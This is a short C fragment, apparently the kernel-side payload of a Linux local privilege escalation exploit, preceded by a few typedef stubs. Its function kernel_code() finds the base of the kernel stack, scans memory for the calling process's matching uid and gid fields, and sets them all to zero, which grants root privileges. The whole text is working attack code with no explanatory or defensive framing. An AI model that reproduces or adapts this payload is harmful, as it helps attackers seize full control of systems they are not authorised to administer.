
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 unsigned long gid ;
 unsigned long uid ;

void kernel_code()
{
 unsigned long where=0;
 unsigned long *pcb_task_struct;

 where=(unsigned long )&where;
 where&=~8191;
 pcb_task_struct=(unsigned long *)where;

 while(pcb_task_struct){
  if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&
   pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&
   pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&
   pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){
   pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;
   pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;
   break;
  }
  pcb_task_struct++;
 }
 return;
}
